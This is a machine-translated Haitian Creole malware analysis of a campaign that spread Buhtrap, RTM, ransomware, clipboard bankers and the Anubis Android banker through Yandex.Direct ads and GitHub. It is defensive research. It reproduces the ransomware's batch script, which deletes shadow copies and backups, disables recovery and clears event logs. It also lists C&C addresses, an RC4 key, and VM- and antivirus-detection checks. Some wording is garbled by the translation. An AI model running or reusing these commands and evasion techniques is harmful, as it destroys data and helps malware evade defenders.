Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct

Pou vize kontab yo nan yon atak cyber, ou ka itilize dokiman travay yo chèche sou entènèt. Sa a se apeprè sa yon gwoup cyber te fè pandan kèk mwa ki sot pase yo, distribye li te ye backdoors. Buhtrap и RTM, osi byen ke ancryptors ak lojisyèl pou vòlè cryptocurrencies. Pifò objektif yo sitiye nan Larisi. Te atak la te pote soti nan mete piblisite move sou Yandex.Direct. Viktim potansyèl yo te dirije yo nan yon sit entènèt kote yo te mande yo telechaje yon dosye move degize kòm yon modèl dokiman. Yandex retire move piblisite a apre avètisman nou an.

Kòd sous Buhtrap a te koule sou entènèt nan tan lontan an pou nenpòt moun ka itilize li. Nou pa gen okenn enfòmasyon konsènan disponiblite kòd RTM.

Nan pòs sa a nou pral di w ki jan atakè yo distribye malveyan lè l sèvi avèk Yandex.Direct epi òganize li sou GitHub. Pòs la pral fini ak yon analiz teknik nan malveyan an.

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct

Buhtrap ak RTM yo tounen nan biznis

Mekanis gaye ak viktim yo

Plizyè chaj yo bay viktim yo pataje yon mekanis pwopagasyon komen. Tout fichye move ki te kreye pa atakè yo te mete nan de repozitwa GitHub diferan.

Tipikman, repozitwa a gen yon sèl fichye move telechaje, ki chanje souvan. Depi GitHub pèmèt ou wè istwa chanjman nan yon depo, nou ka wè ki malveyan yo te distribye pandan yon sèten peryòd. Pou konvenk viktim nan telechaje fichye move a, yo te itilize sit entènèt blanki-shabloni24[.]ru, ki montre nan figi ki anwo a.

Desen an nan sit la ak tout non yo nan dosye yo move swiv yon sèl konsèp - fòm, modèl, kontra, echantiyon, elatriye Lè nou konsidere ke Buhtrap ak RTM lojisyèl yo te deja itilize nan atak sou kontab nan tan lontan an, nou sipoze ke la estrateji nan nouvo kanpay la se menm bagay la. Sèl kesyon an se ki jan viktim nan te rive sou sit entènèt atakè yo.

Enfeksyon

Omwen plizyè viktim potansyèl ki te fini sou sit sa a te atire pa move piblisite. Anba a se yon egzanp URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

Kòm ou ka wè nan lyen an, yo te afiche banyè a sou fowòm kontablite lejitim bb.f2[.]kz. Li enpòtan sonje ke bandwòl yo te parèt sou sit diferan, tout te gen menm id kanpay (blanki_rsya), ak pi ki gen rapò ak sèvis kontablite oswa asistans legal. URL la montre ke potansyèl viktim nan te itilize demann lan "telechaje fòm fakti," ki sipòte ipotèz nou an nan atak vize. Anba a se sit kote bandwòl yo te parèt ak demann rechèch korespondan yo.

  • telechaje fòm fakti – bb.f2[.]kz
  • echantiyon kontra - Ipopen[.]ru
  • echantiyon plent aplikasyon - 77metrov[.]ru
  • fòm akò - vid-dogovor-kupli-prodazhi[.]ru
  • echantiyon tribinal petisyon - zen.yandex[.]ru
  • echantiyon plent - yurday[.]ru
  • echantiyon fòm kontra – Regforum[.]ru
  • fòm kontra – assistentus[.]ru
  • echantiyon akò apatman – ​​napravah[.]com
  • echantiyon nan kontra legal - avito[.]ru

Sit blanki-shabloni24[.]ru a ka konfigirasyon pou pase yon senp evalyasyon vizyèl. Tipikman, yon anons ki montre yon sit pwofesyonèl ki gen yon lyen nan GitHub pa sanble yon bagay evidamman move. Anplis de sa, atakè yo telechaje fichye move nan repozitwa a sèlman pou yon peryòd limite, gen anpil chans pandan kanpay la. Pifò nan tan an, repozitwa GitHub la te genyen yon achiv postal vid oswa yon dosye EXE vid. Se konsa, atakè yo te kapab distribye piblisite atravè Yandex.Direct sou sit ki te gen plis chans vizite pa kontab ki te vini an repons a demann rechèch espesifik.

Apre sa, an n gade sou plizyè charges distribiye nan fason sa a.

Analiz chaj

Kwonoloji distribisyon

Kanpay move a te kòmanse nan fen mwa Oktòb 2018 epi li aktif nan moman sa a ekri. Depi tout depo a te disponib piblikman sou GitHub, nou te konpile yon delè egzat sou distribisyon sis fanmi malveyan diferan (gade figi ki anba a). Nou te ajoute yon liy ki montre lè yo te dekouvri lyen banyè a, jan ESET telemetry mezire, pou konparezon ak istwa git. Kòm ou ka wè, sa a korelasyon byen ak disponiblite a nan chaj la sou GitHub. Diferans nan fen mwa fevriye a ka eksplike pa lefèt ke nou pa t 'gen yon pati nan istwa chanjman an paske depo a te retire nan GitHub anvan nou te kapab jwenn li an antye.

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct
Figi 1. Kwonoloji distribisyon malveyan.

Sètifika siyen Kòd

Kanpay la te itilize plizyè sètifika. Gen kèk ki te siyen pa plis pase yon fanmi malveyan, ki plis endike ke echantiyon diferan ki te fè pati kanpay la menm. Malgre disponiblite kle prive a, operatè yo pa t siyen sistematik binè yo epi yo pa t sèvi ak kle a pou tout echantiyon yo. Nan fen mwa fevriye 2019, atakè yo te kòmanse kreye siyati envalid lè l sèvi avèk yon sètifika Google posede pou yo pa t gen kle prive a.

Tout sètifika ki enplike nan kanpay la ak fanmi malveyan yo siyen yo ki nan lis nan tablo ki anba a.

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct

Nou te itilize sètifika siyen kòd sa yo tou pou etabli lyen ak lòt fanmi malveyan. Pou pifò sètifika, nou pa t jwenn echantiyon ki pa te distribye atravè yon depo GitHub. Sepandan, sètifika TOV "MARIYA" te itilize pou siyen malveyan ki fè pati botne a Wauchos, publisitèr ak minè. Li pa posib ke malveyan sa a gen rapò ak kanpay sa a. Gen plis chans, sètifika a te achte sou darknet la.

Win32/Filecoder.Buhtrap

Premye eleman ki te atire atansyon nou se Win32/Filecoder.Buhtrap ki fèk dekouvri. Sa a se yon dosye binè Delphi ki pafwa pake. Li te sitou distribye nan mwa fevriye-mas 2019. Li konpòte li jan sa dwe fèt pou yon pwogram ransomware - li chèche kondui lokal yo ak dosye rezo yo epi li ankripte dosye yo detekte yo. Li pa bezwen yon koneksyon entènèt yo dwe konpwomèt paske li pa kontakte sèvè a voye kle chifreman. Olye de sa, li ajoute yon "siy" nan fen mesaj ranson an, epi sijere itilize imel oswa Bitmessage pou kontakte operatè yo.

Pou ankripte kòm anpil resous sansib ke posib, Filecoder.Buhtrap kouri yon fil ki fèt yo fèmen lojisyèl kle ki ka gen moun kap okipe dosye louvri ki gen enfòmasyon ki gen anpil valè ki ta ka entèfere ak chifreman. Pwosesis sib yo se sitou sistèm jesyon baz done (DBMS). Anplis de sa, Filecoder.Buhtrap efase dosye boutèy demi lit ak sovgad pou fè rekiperasyon done difisil. Pou fè sa, kouri script pakèt ki anba a.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap sèvi ak yon sèvis lejitim sou entènèt IP Logger ki fèt pou kolekte enfòmasyon sou vizitè sit entènèt yo. Sa a gen entansyon swiv viktim ransomware la, ki se responsablite liy lòd la:

mshta.exe "javascript:document.write('');"

Fichye pou chifreman yo chwazi si yo pa matche ak twa lis esklizyon. Premyèman, dosye ki gen ekstansyon sa yo pa chiffres: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ak .bat. Dezyèmman, tout fichye pou ki chemen konplè a gen kòd anyè nan lis ki anba a yo eskli.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

Twazyèmman, sèten non dosye yo ekskli tou nan chifreman, pami yo non fichye mesaj ranson an. Lis la prezante anba a. Li evidan, tout eksepsyon sa yo gen entansyon kenbe machin nan kouri, men ak iminitè minimòm.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

Konplo chifreman dosye

Yon fwa egzekite, malveyan an jenere yon pè kle RSA 512-bit. Lè sa a, ekspozan prive (d) ak modil (n) yo ankripte ak yon kle piblik 2048-bit ki kode difisil (ekspozan piblik ak modil), zlib-packed, ak base64 kode. Kòd ki responsab pou sa a montre nan Figi 2.

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct
Figi 2. Rezilta dekonpilasyon Hex-Rays nan pwosesis jenerasyon pè kle RSA 512-bit.

Anba la a se yon egzanp tèks klè ak yon kle prive ki pwodui, ki se yon siy tache ak mesaj ranson an.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

Yo bay kle piblik atakè yo anba a.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

Fichye yo ankripte lè l sèvi avèk AES-128-CBC ak yon kle 256-bit. Pou chak fichye chiffres, yon nouvo kle ak yon nouvo vektè inisyalizasyon yo pwodwi. Enfòmasyon kle yo ajoute nan fen fichye chiffres la. Ann konsidere fòma fichye chiffres la.
Fichye chiffres gen tèt sa a:

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct

Done fichye sous yo ak adisyon valè majik VEGA ankode nan premye 0x5000 bytes yo. Tout enfòmasyon dechifre yo tache ak yon dosye ki gen estrikti sa a:

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct

- Makè gwosè dosye a gen yon mak ki endike si fichye a pi gwo pase 0x5000 octets nan gwosè
— AES kle blob = ZlibCompress (RSAEncrypt (Kle AES + IV, kle piblik nan pè kle RSA pwodwi))
- RSA kle blob = ZlibCompress (RSAEncrypt (pwodwi kle prive RSA, kle piblik RSA ki kode di))

Win32/ClipBanker

Win32/ClipBanker se yon eleman ki te distribye tanzantan soti nan fen mwa oktòb rive nan kòmansman desanm 2018. Wòl li se kontwole sa ki nan clipboard la, li sanble pou adrès bous cryptocurrency. Apre yo fin detèmine adrès bous la sib, ClipBanker ranplase li ak yon adrès yo kwè ke li fè pati operatè yo. Echantiyon yo nou egzamine yo pa te ni bwat ni obfuscate. Sèl mekanis yo itilize pou maske konpòtman se kòd chifreman. Adrès bous operatè yo ankripte lè l sèvi avèk RC4. Kript lajan sib yo se Bitcoin, Bitcoin lajan kach, Dogecoin, Ethereum ak Ripple.

Pandan peryòd malveyan an te gaye nan bous Bitcoin atakan yo, yo te voye yon ti kantite lajan bay VTS, ki mete dout sou siksè kanpay la. Anplis de sa, pa gen okenn prèv ki sijere ke tranzaksyon sa yo te gen rapò ak ClipBanker ditou.

Win32/RTM

Eleman Win32/RTM te distribye pandan plizyè jou nan kòmansman mwa mas 2019. RTM se yon bankye Trojan ekri nan Delphi, ki vize a sistèm bankè aleka. An 2017, chèchè ESET te pibliye analiz detaye nan pwogram sa a, deskripsyon an toujou enpòtan. Nan mwa janvye 2019, Palo Alto Networks te pibliye tou pòs blog sou RTM.

Buhtrap Loader

Pandan kèk tan, yon telechaje te disponib sou GitHub ki pa t sanble ak zouti Buhtrap anvan yo. Li tounen vin jwenn https://94.100.18[.]67/RSS.php?<some_id> jwenn pwochen etap la epi chaje li dirèkteman nan memwa. Nou ka distenge de konpòtman nan dezyèm etap kòd la. Nan premye URL la, RSS.php te pase degize Buhtrap dirèkteman - degize sa a sanble anpil ak youn ki disponib apre kòd sous la te koule.

Enteresan, nou wè plizyè kanpay ak degize Buhtrap, epi yo swadizan dirije pa operatè diferan. Nan ka sa a, diferans prensipal la se ke degize a chaje dirèkteman nan memwa epi li pa sèvi ak konplo abityèl la ak pwosesis deplwaman DLL ke nou te pale sou yo. anvan. Anplis de sa, operatè yo chanje kle RC4 yo itilize pou ankripte trafik rezo a nan sèvè C&C la. Nan pifò nan kanpay nou te wè yo, operatè yo pa t deranje chanje kle sa a.

Dezyèm, konpòtman ki pi konplèks te ke URL RSS.php la te pase nan yon lòt loader. Li aplike kèk obfuscation, tankou rebati tab enpòte dinamik la. Objektif bootloader la se kontakte sèvè C&C la msiofficeupd[.]com/api/F27F84EDA4D13B15/2, voye mòso bwa yo epi tann yon repons. Li trete repons lan kòm yon pate, chaje li nan memwa epi egzekite li. Chaj la nou te wè ap egzekite loader sa a se te menm pòt dèyè Buhtrap, men ka gen lòt konpozan.

Android/Spy.Banker

Enteresan, yo te jwenn yon eleman pou android tou nan depo GitHub la. Li te nan branch prensipal la pou yon sèl jou - 1 Novanm 2018. Apa ke yo te afiche sou GitHub, ESET telemetry pa jwenn okenn prèv ki montre malveyan sa a yo te distribye.

Eleman an te anime kòm yon Pake Aplikasyon Android (APK). Li trè obfuscate. Konpòtman move a kache nan yon JAR chiffres ki sitiye nan APK a. Li ankripte ak RC4 lè l sèvi avèk kle sa a:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

Menm kle a ak algorithm yo itilize yo ankripte fisèl. JAR sitiye nan APK_ROOT + image/files. Premye 4 octets nan fichye a genyen longè JAR chiffres la, ki kòmanse imedyatman apre jaden an longè.

Èske w gen dechifre dosye a, nou dekouvri ke li te Anubis - deja dokimante bankye pou android. Malveyan an gen karakteristik sa yo:

  • anrejistreman mikwofòn
  • pran Ekran
  • jwenn kowòdone GPS
  • kelodje
  • aparèy chifreman done ak demann ranson
  • voye spam

Enteresan, bankye a te itilize Twitter kòm yon kanal kominikasyon backup pou jwenn yon lòt sèvè C&C. Echantiyon nou analize a te itilize kont @JonesTrader, men nan moman analiz li te deja bloke.

Bankye a gen yon lis aplikasyon sib sou aparèy android a. Li pi long pase lis yo jwenn nan etid Sophos la. Lis la gen ladann anpil aplikasyon bankè, pwogram fè makèt sou entènèt tankou Amazon ak eBay, ak sèvis cryptocurrency.

MSIL/ClipBanker.IH

Dènye eleman ki te distribye kòm yon pati nan kanpay sa a se .NET Windows ègzèkutabl, ki te parèt nan mwa mas 2019. Pifò nan vèsyon yo etidye yo te pake ak ConfuserEx v1.0.0. Menm jan ak ClipBanker, eleman sa a itilize clipboard la. Objektif li se yon pakèt lajan kript, osi byen ke òf sou machin vapè. Anplis de sa, li itilize sèvis IP Logger pou vòlè kle WIF prive Bitcoin.

Mekanis pwoteksyon
Anplis de benefis ke ConfuserEx bay nan anpeche debogaj, jete fatra, ak manipilasyon, eleman nan gen ladan kapasite nan detekte pwodwi antivirus ak machin vityèl.

Pou verifye ke li kouri nan yon machin vityèl, malveyan an sèvi ak liy lòd Windows WMI (WMIC) entegre pou mande enfòmasyon BIOS, sètadi:

wmic bios

Lè sa a, pwogram nan analize pwodiksyon an kòmand epi gade pou mo kle: VBOX, VirtualBox, XEN, qemu, bochs, VM.

Pou detekte pwodwi antivirus, malveyan voye yon demann Windows Management Instrumentation (WMI) nan Windows Security Center lè l sèvi avèk ManagementObjectSearcher API jan yo montre anba a. Apre dekodaj soti nan baz64 apèl la sanble sa a:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct
Figi 3. Pwosesis pou idantifye pwodwi antivirus.

Anplis de sa, malveyan an tcheke si wi ou non CryptoClipWatcher, yon zouti pou pwoteje kont atak clipboard epi, si kouri, sispann tout fil nan pwosesis sa a, kidonk enfim pwoteksyon an.

Pèsistans

Vèsyon malveyan nou etidye a kopi tèt li nan %APPDATA%googleupdater.exe epi li mete atribi "kache" pou anyè Google la. Lè sa a, li chanje valè a SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell nan rejis Windows la epi li ajoute chemen an updater.exe. Nan fason sa a, malveyan yo pral egzekite chak fwa itilizatè a konekte.

Konpòtman move

Menm jan ak ClipBanker, malveyan an kontwole sa ki nan clipboard la epi gade pou adrès bous kriptografik lajan, epi lè yo jwenn, ranplase li ak youn nan adrès operatè a. Anba a se yon lis adrès sib ki baze sou sa yo jwenn nan kòd la.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Pou chak kalite adrès gen yon ekspresyon regilye korespondan. Valè STEAM_URL yo itilize pou atake sistèm vapè a, jan yo ka wè nan ekspresyon regilye yo itilize pou defini nan tanpon an:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

Kannal eksfiltrasyon

Anplis de ranplase adrès nan tanpon an, malveyan an vize kle prive WIF Bitcoin, Bitcoin Core ak Electrum Bitcoin bous. Pwogram nan itilize plogger.org kòm yon kanal eksfiltrasyon pou jwenn kle prive WIF la. Pou fè sa, operatè yo ajoute done kle prive nan header HTTP Itilizatè-Ajan, jan yo montre anba a.

Yo te distribye backdoor ak Buhtrap ankriptateur lè l sèvi avèk Yandex.Direct
Figi 4. IP Logger konsole ak done pwodiksyon.

Operatè yo pa t 'sèvi ak iplogger.org pou eksfiltre bous. Yo pwobableman te itilize yon metòd diferan akòz limit karaktè 255 nan jaden an User-Agentparèt nan koòdone wèb IP Logger la. Nan echantiyon yo nou etidye, lòt sèvè pwodiksyon an te estoke nan varyab anviwònman an DiscordWebHook. Surprenante, varyab anviwònman sa a pa plase okenn kote nan kòd la. Sa a sijere ke malveyan an toujou sou devlopman ak varyab la asiyen nan machin tès operatè a.

Gen yon lòt siy ke pwogram nan ap devlope. Fichye binè a gen ladan de URL iplogger.org, epi tou de yo mande lè done yo eksfiltre. Nan yon demann nan youn nan URL sa yo, valè a nan jaden Referer la anvan pa "DEV /". Nou jwenn tou yon vèsyon ki pa te pake lè l sèvi avèk ConfuserEx, moun k ap resevwa adrès URL sa a rele DevFeedbackUrl. Ki baze sou non varyab anviwònman an, nou kwè ke operatè yo ap planifye yo sèvi ak sèvis la lejitim Discord ak sistèm entèsepsyon entènèt li yo nan vòlè bous cryptocurrency.

Konklizyon

Kanpay sa a se yon egzanp itilizasyon sèvis piblisite lejitim nan atak cyber. Konplo a vize òganizasyon Ris, men nou pa ta sezi wè yon atak konsa lè l sèvi avèk sèvis ki pa Ris. Pou evite konpwomi, itilizatè yo dwe gen konfyans nan repitasyon sous lojisyèl yo telechaje yo.

Yon lis konplè endikatè konpwomi ak atribi MITRE ATT&CK disponib nan lyen.

Sous: www.habr.com

Add nouvo kòmantè